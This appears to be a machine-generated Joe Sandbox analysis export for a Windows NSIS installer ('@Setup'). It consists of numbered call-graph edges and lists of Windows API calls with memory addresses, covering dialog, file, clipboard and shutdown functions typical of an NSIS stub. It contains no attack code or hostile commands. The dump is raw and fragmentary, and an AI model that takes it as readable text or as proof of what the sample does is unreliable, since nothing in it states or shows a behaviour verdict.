4738 402922 4734->4738 4735->4718 4738->4723 4740 4062cf 11 API calls 4740->4738 4742 406273 4741->4742 4743 4062b6 4742->4743 4744 406288 wsprintfW 4742->4744 4745 402991 4743->4745 4746 4062bf lstrcatW 4743->4746 4744->4743 4744->4744 4745->4740 4746->4745 4747 403d02 4748 403d0d 4747->4748 4749 403d11 4748->4749 4750 403d14 GlobalAlloc 4748->4750 4750->4749 4751 402082 4752 401446 18 API calls 4751->4752 4753 402093 SetWindowLongW 4752->4753 4754 4030e3 4753->4754 4755 402a84 4756 401553 19 API calls 4755->4756 4757 402a8e 4756->4757 4758 401446 18 API calls 4757->4758 4759 402a98 4758->4759 4760 401a13 4759->4760 4761 402ab2 RegEnumKeyW 4759->4761 4762 402abe RegEnumValueW 4759->4762 4763 402a7e 4761->4763 4762->4760 4762->4763 4763->4760 4764 4029e4 RegCloseKey 4763->4764 4764->4760 4765 402c8a 4766 402ca2 4765->4766 4767 402c8f 4765->4767 4769 40145c 18 API calls 4766->4769 4768 401446 18 API calls 4767->4768 4771 402c97 4768->4771 4770 402ca9 lstrlenW 4769->4770 4770->4771 4772 401a13 4771->4772 4773 402ccb WriteFile 4771->4773 4773->4772 4774 401d8e 4775 40145c 18 API calls 4774->4775 4776 401d95 ExpandEnvironmentStringsW 4775->4776 4777 401da8 4776->4777 4778 401db9 4776->4778 4777->4778 4779 401dad lstrcmpW 4777->4779 4779->4778 4780 401e0f 4781 401446 18 API calls 4780->4781 4782 401e17 4781->4782 4783 401446 18 API calls 4782->4783 4784 401e21 4783->4784 4785 4030e3 4784->4785 4787 405f7d wsprintfW 4784->4787 4787->4785 4788 40438f 4789 4043c8 4788->4789 4790 40439f 4788->4790 4791 403df6 8 API calls 4789->4791 4792 403d6b 19 API calls 4790->4792 4794 4043d4 4791->4794 4793 4043ac SetDlgItemTextW 4792->4793 4793->4789 4795 403f90 4796 403fa0 4795->4796 4797 403fbc 4795->4797 4806 405cb0 GetDlgItemTextW 4796->4806 4799 403fc2 SHGetPathFromIDListW 4797->4799 4800 403fef 4797->4800 4802 403fd2 4799->4802 4805 403fd9 SendMessageW 4799->4805 4801 403fad SendMessageW 4801->4797 4803 40141d 80 API calls 4802->4803 4803->4805 4805->4800 4806->4801 4807 402392 
4808 40145c 18 API calls 4807->4808 4809 402399 4808->4809 4812 407224 4809->4812 4813 406efe 25 API calls 4812->4813 4814 407244 4813->4814 4815 4023a7 4814->4815 4816 40724e lstrcpynW lstrcmpW 4814->4816 4817 407280 4816->4817 4818 407286 lstrcpynW 4816->4818 4817->4818 4818->4815 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f 
CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4819 402797 4820 40145c 18 API calls 4819->4820 4821 4027ae 4820->4821 4822 40145c 18 API calls 4821->4822 4823 4027b7 4822->4823 4824 40145c 18 API calls 4823->4824 4825 4027c0 GetPrivateProfileStringW lstrcmpW 4824->4825 4826 401e9a 4827 40145c 18 API calls 4826->4827 4828 401ea1 4827->4828 4829 401446 18 API calls 4828->4829 4830 401eab wsprintfW 4829->4830 3790 401a1f 3791 40145c 18 API calls 3790->3791 3792 401a26 3791->3792 3793 4062cf 11 API calls 3792->3793 3794 401a49 3793->3794 3795 401a64 3794->3795 3796 401a5c 3794->3796 3865 406035 lstrcpynW 3795->3865 3864 406035 lstrcpynW 3796->3864 3799 401a6f 3866 40674e lstrlenW CharPrevW 3799->3866 3800 401a62 3803 406064 5 API calls 3800->3803 3834 401a81 3803->3834 3804 406301 2 API calls 3804->3834 3807 401a98 CompareFileTime 3807->3834 3808 401ba9 3809 404f9e 25 API calls 3808->3809 3811 401bb3 3809->3811 3810 401b5d 3812 404f9e 25 API calls 3810->3812 3843 40337f 3811->3843 3814 401b70 3812->3814 3818 4062cf 11 API calls 3814->3818 3816 406035 lstrcpynW 3816->3834 3817 4062cf 11 API calls 3819 401bda 3817->3819 3823 401b8b 3818->3823 3820 401be9 SetFileTime 3819->3820 3821 401bf8 CloseHandle 3819->3821 3820->3821 3821->3823 3824 401c09 3821->3824 3822 406831 18 API calls 3822->3834 3825 401c21 3824->3825 3826 401c0e 3824->3826 3827 406831 18 API calls 3825->3827 3828 406831 18 API calls 3826->3828 3829 401c29 3827->3829 3831 401c16 lstrcatW 3828->3831 3832 4062cf 11 API 
calls 3829->3832 3831->3829 3835 401c34 3832->3835 3833 401b50 3837 401b93 3833->3837 3838 401b53 3833->3838 3834->3804 3834->3807 3834->3808 3834->3810 3834->3816 3834->3822 3834->3833 3836 4062cf 11 API calls 3834->3836 3842 405e7c GetFileAttributesW CreateFileW 3834->3842 3869 405e5c GetFileAttributesW 3834->3869 3872 405ccc 3834->3872 3839 405ccc MessageBoxIndirectW 3835->3839 3836->3834 3840 4062cf 11 API calls 3837->3840 3841 4062cf 11 API calls 3838->3841 3839->3823 3840->3823 3841->3810 3842->3834 3844 40339a 3843->3844 3845 4033c7 3844->3845 3878 403368 SetFilePointer 3844->3878 3876 403336 ReadFile 3845->3876 3849 401bc6 3849->3817 3850 403546 3852 40354a 3850->3852 3853 40356e 3850->3853 3851 4033eb GetTickCount 3851->3849 3856 403438 3851->3856 3854 403336 ReadFile 3852->3854 3853->3849 3857 403336 ReadFile 3853->3857 3858 40358d WriteFile 3853->3858 3854->3849 3855 403336 ReadFile 3855->3856 3856->3849 3856->3855 3860 40348a GetTickCount 3856->3860 3861 4034af MulDiv wsprintfW 3856->3861 3863 4034f3 WriteFile 3856->3863 3857->3853 3858->3849 3859 4035a1 3858->3859 3859->3849 3859->3853 3860->3856 3862 404f9e 25 API calls 3861->3862 3862->3856 3863->3849 3863->3856 3864->3800 3865->3799 3867 401a75 lstrcatW 3866->3867 3868 40676b lstrcatW 3866->3868 3867->3800 3868->3867 3870 405e79 3869->3870 3871 405e6b SetFileAttributesW 3869->3871 3870->3834 3871->3870 3873 405ce1 3872->3873 3874 405d2f 3873->3874 3875 405cf7 MessageBoxIndirectW 3873->3875 3874->3834 3875->3874 3877 403357 3876->3877 3877->3849 3877->3850 3877->3851 3878->3845 4831 40209f GetDlgItem GetClientRect 4832 40145c 18 API calls 4831->4832 4833 4020cf LoadImageW SendMessageW 4832->4833 4834 4030e3 4833->4834 4835 4020ed DeleteObject 4833->4835 4835->4834 4836 402b9f 4837 401446 18 API calls 4836->4837 4841 402ba7 4837->4841 4838 402c4a 4839 402bdf ReadFile 4839->4841 4848 402c3d 4839->4848 4840 401446 18 API calls 4840->4848 4841->4838 4841->4839 4842 402c06 MultiByteToWideChar 4841->4842 
4843 402c3f 4841->4843 4844 402c4f 4841->4844 4841->4848 4842->4841 4842->4844 4849 405f7d wsprintfW 4843->4849 4846 402c6b SetFilePointer 4844->4846 4844->4848 4846->4848 4847 402d17 ReadFile 4847->4848 4848->4838 4848->4840 4848->4847 4849->4838 4850 402b23 GlobalAlloc 4851 402b39 4850->4851 4852 402b4b 4850->4852 4853 401446 18 API calls 4851->4853 4854 40145c 18 API calls 4852->4854 4856 402b41 4853->4856 4855 402b52 WideCharToMultiByte lstrlenA 4854->4855 4855->4856 4857 402b84 WriteFile 4856->4857 4858 402b93 4856->4858 4857->4858 4859 402384 GlobalFree 4857->4859 4859->4858 4861 4040a3 4862 4040b0 lstrcpynW lstrlenW 4861->4862 4863 4040ad 4861->4863 4863->4862 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 3455->3468 3456 40590a DestroyWindow KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 
3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 
3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 
3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 406301 2 API calls 3583->3608 3592 4017c9 3584->3592 3593 4016a7 Sleep 3585->3593 3594 4018eb 3586->3594 3595 401627 3587->3595 3596 40139d 65 API calls 3588->3596 3597 40179a 3589->3597 3589->3613 3606 404f9e 25 API calls 3590->3606 3640 405d85 CharNextW CharNextW 3592->3640 3593->3613 3603 40145c 18 API calls 3594->3603 3604 404f9e 25 API calls 3595->3604 3596->3613 3605 4062cf 11 API calls 3597->3605 3598 4018c2 3609 4062cf 11 API calls 3598->3609 3599 4018a9 3607 4062cf 11 API calls 3599->3607 3602->3613 3611 4018f5 3603->3611 3604->3613 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3617 405d32 CharNextW 3610->3617 3635 4062cf 11 API calls 3610->3635 3615 4062cf 11 API calls 3611->3615 3612->3582 3666 406035 lstrcpynW 3612->3666 3613->3511 3614->3590 3616 40186e 3614->3616 3618 401902 MoveFileW 3615->3618 3646 404f9e 3616->3646 3621 4017e6 CreateDirectoryW 3617->3621 3622 401912 3618->3622 3623 40191e 3618->3623 3621->3610 3625 4017fe GetLastError 3621->3625 3622->3590 3629 406301 2 API calls 3623->3629 3639 401942 3623->3639 3627 401827 GetFileAttributesW 3625->3627 3628 40180b GetLastError 3625->3628 3627->3610 3632 4062cf 11 API calls 3628->3632 3633 401929 3629->3633 3630 401882 SetCurrentDirectoryW 3630->3613 3631 4062cf 11 API calls 3634 40195c 3631->3634 3632->3610 3633->3639 3661 406c94 3633->3661 3634->3613 3635->3610 3638 404f9e 25 API calls 3638->3639 3639->3631 3641 405da2 3640->3641 3644 405db4 3640->3644 3643 405daf CharNextW 3641->3643 3641->3644 3642 405dd8 3642->3610 3643->3642 3644->3642 3645 405d32 CharNextW 3644->3645 3645->3644 3647 404fb7 3646->3647 3648 401875 3646->3648 3649 404fd5 lstrlenW 3647->3649 3650 406831 18 API calls 3647->3650 3657 406035 lstrcpynW 3648->3657 3651 404fe3 lstrlenW 3649->3651 3652 404ffe 3649->3652 3650->3649 3651->3648 3653 404ff5 lstrcatW 3651->3653 3654 405011 
3652->3654 3655 405004 SetWindowTextW 3652->3655 3653->3652 3654->3648 3656 405017 SendMessageW SendMessageW SendMessageW 3654->3656 3655->3654 3656->3648 3657->3630 3659 4018a5 3658->3659 3660 406317 FindClose 3658->3660 3659->3598 3659->3599 3660->3659 3668 406328 GetModuleHandleA 3661->3668 3665 401936 3665->3638 3666->3582 3667->3613 3669 406340 LoadLibraryA 3668->3669 3670 40634b GetProcAddress 3668->3670 3669->3670 3671 406359 3669->3671 3670->3671 3671->3665 3672 406ac5 lstrcpyW 3671->3672 3673 406b13 GetShortPathNameW 3672->3673 3674 406aea 3672->3674 3675 406b2c 3673->3675 3676 406c8e 3673->3676 3698 405e7c GetFileAttributesW CreateFileW 3674->3698 3675->3676 3679 406b34 WideCharToMultiByte 3675->3679 3676->3665 3678 406af3 CloseHandle GetShortPathNameW 3678->3676 3680 406b0b 3678->3680 3679->3676 3681 406b51 WideCharToMultiByte 3679->3681 3680->3673 3680->3676 3681->3676 3682 406b69 wsprintfA 3681->3682 3683 406831 18 API calls 3682->3683 3684 406b95 3683->3684 3699 405e7c GetFileAttributesW CreateFileW 3684->3699 3686 406ba2 3686->3676 3687 406baf GetFileSize GlobalAlloc 3686->3687 3688 406bd0 ReadFile 3687->3688 3689 406c84 CloseHandle 3687->3689 3688->3689 3690 406bea 3688->3690 3689->3676 3690->3689 3700 405de2 lstrlenA 3690->3700 3693 406c03 lstrcpyA 3696 406c25 3693->3696 3694 406c17 3695 405de2 4 API calls 3694->3695 3695->3696 3697 406c5c SetFilePointer WriteFile GlobalFree 3696->3697 3697->3689 3698->3678 3699->3686 3701 405e23 lstrlenA 3700->3701 3702 405e2b 3701->3702 3703 405dfc lstrcmpiA 3701->3703 3702->3693 3702->3694 3703->3702 3704 405e1a CharNextA 3703->3704 3704->3701 4864 402da5 4865 4030e3 4864->4865 4866 402dac 4864->4866 4867 401446 18 API calls 4866->4867 4868 402db8 4867->4868 4869 402dbf SetFilePointer 4868->4869 4869->4865 4870 402dcf 4869->4870 4870->4865 4872 405f7d wsprintfW 4870->4872 4872->4865 4873 4049a8 GetDlgItem GetDlgItem 4874 4049fe 7 API calls 4873->4874 4879 404c16 4873->4879 4875 404aa2 DeleteObject 4874->4875 
4876 404a96 SendMessageW 4874->4876 4877 404aad 4875->4877 4876->4875 4880 404ae4 4877->4880 4883 406831 18 API calls 4877->4883 4878 404cfb 4881 404da0 4878->4881 4882 404c09 4878->4882 4887 404d4a SendMessageW 4878->4887 4879->4878 4891 40487a 5 API calls 4879->4891 4904 404c86 4879->4904 4886 403d6b 19 API calls 4880->4886 4884 404db5 4881->4884 4885 404da9 SendMessageW 4881->4885 4888 403df6 8 API calls 4882->4888 4889 404ac6 SendMessageW SendMessageW 4883->4889 4896 404dc7 ImageList_Destroy 4884->4896 4897 404dce 4884->4897 4902 404dde 4884->4902 4885->4884 4892 404af8 4886->4892 4887->4882 4894 404d5f SendMessageW 4887->4894 4895 404f97 4888->4895 4889->4877 4890 404ced SendMessageW 4890->4878 4891->4904 4898 403d6b 19 API calls 4892->4898 4893 404f48 4893->4882 4903 404f5d ShowWindow GetDlgItem ShowWindow 4893->4903 4899 404d72 4894->4899 4896->4897 4900 404dd7 GlobalFree 4897->4900 4897->4902 4906 404b09 4898->4906 4908 404d83 SendMessageW 4899->4908 4900->4902 4901 404bd6 GetWindowLongW SetWindowLongW 4905 404bf0 4901->4905 4902->4893 4907 40141d 80 API calls 4902->4907 4917 404e10 4902->4917 4903->4882 4904->4878 4904->4890 4909 404bf6 ShowWindow 4905->4909 4910 404c0e 4905->4910 4906->4901 4912 404b65 SendMessageW 4906->4912 4913 404bd0 4906->4913 4915 404b93 SendMessageW 4906->4915 4916 404ba7 SendMessageW 4906->4916 4907->4917 4908->4881 4924 403dc4 SendMessageW 4909->4924 4925 403dc4 SendMessageW 4910->4925 4912->4906 4913->4901 4913->4905 4915->4906 4916->4906 4918 404e54 4917->4918 4921 404e3e SendMessageW 4917->4921 4919 404f1f InvalidateRect 4918->4919 4923 404ecd SendMessageW SendMessageW 4918->4923 4919->4893 4920 404f35 4919->4920 4922 4043d9 21 API calls 4920->4922 4921->4918 4922->4893 4923->4918 4924->4882 4925->4879 4926 4030a9 SendMessageW 4927 4030c2 InvalidateRect 4926->4927 4928 4030e3 4926->4928 4927->4928 3879 4038af #17 SetErrorMode OleInitialize 3880 406328 3 API calls 3879->3880 3881 4038f2 SHGetFileInfoW 3880->3881 3953 406035 

Control-flow Graph

[Figure: control-flow graph, first basic block 4050f9-405114; blocks are marked Executed or Not Executed]
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                      • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                    • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                    • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                    • String ID: New install of "%s" to "%s"${
                                                                                                                                                    • API String ID: 2110491804-1641061399

Control-flow Graph

[Figure: control-flow graph, first basic block 4038af-403945; blocks are marked Executed or Not Executed]
                                                                                                                                                    APIs
                                                                                                                                                    • #17.COMCTL32 ref: 004038CE
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                    • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                    • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                    • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                    • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                    • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                    • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                    • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                    • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                    • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
